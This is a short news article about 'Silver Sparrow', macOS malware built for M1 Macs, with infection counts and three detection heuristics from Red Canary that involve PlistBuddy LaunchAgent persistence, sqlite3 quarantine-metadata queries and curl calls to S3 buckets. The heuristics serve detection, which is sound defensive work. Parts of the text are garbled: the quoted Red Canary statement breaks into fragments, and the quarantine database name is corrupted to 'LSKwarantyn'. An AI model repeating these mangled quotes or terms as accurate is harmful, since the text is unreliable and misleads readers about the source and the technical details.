The second known piece of malware that was originally compiled to be used on M1 Macs was discovered by security firm Red Canary.
/article-new/2021/02/m1-mac-mini-screen.jpg?resize=560%2C315&ssl=1)
Given the name “Silver Sparrow”, it is said that the malicious package uses the macOS Installer JavaScript API to execute suspicious commands. After more than a week of observing the malware, neither Red Canary nor its research partners observed a final payload. However, the exact threat posed by the malware remains a mystery.
Nevertheless, Red Canary said the malware could be a fairly serious threat:
Although we have not yet observed Silver Sparrow delivering additional malicious loads, the forward-looking M1 disk compatibility, global reach, relatively high infection rate, and operational maturity suggest that Silver Sparrow is a fairly serious threat, uniquely positioned to be a potential threat. to deliver effective payload. instant notification.
According to data provided by Malwarebytes, ‘Silver Sparrow’ infected 17,139 macOS systems in 153 countries as of February 17, including ‘major detection in the United States, the United Kingdom, Canada, France and Germany’. Red Canary did not specify how many of these systems were M1 Macs, if any.
Since the “Silver Sparrow” binaries “do not look like much yet”, Red Canary referred to them as ‘bystander binaries’. When running on Intel-based Macs, the malicious package simply displays an empty window with “Hello, World!” message, while the Apple silicone binary leads to a red window that says “You did it!”
/article-new/2021/02/you-did-it-silver-sparrow.png?resize=560%2C394&ssl=1)
Red Canary has shared methods to detect a wide range of macOS threats, but the steps are not specific to detecting “Silver Sparrow”:
– Look for a process that looks like PlistBuddy is running along with a command line that contains the following: LaunchAgents and RunAtLoad and true. This analysis helps us find several MacOS malware families that establish LaunchAgent persistence.
– Look for a process that looks like it executes sqlite3 along with a
command line containing: LSKwarantyn. This analysis helps us to find several MacOS malware families that manipulate or search metadata for downloaded files.
– Look for a process that looks like it’s going to be a curl, along with a command line that contains: s3.amazonaws.com. This analysis helps us to find several MacOS malware families that use S3 buckets to distribute.
The first piece of malware that could originally work on M1 Macs was discovered a few days ago. Technical details about this second piece of malware can be found in the Red Canary blog post, and Ars Technica also has a good layout.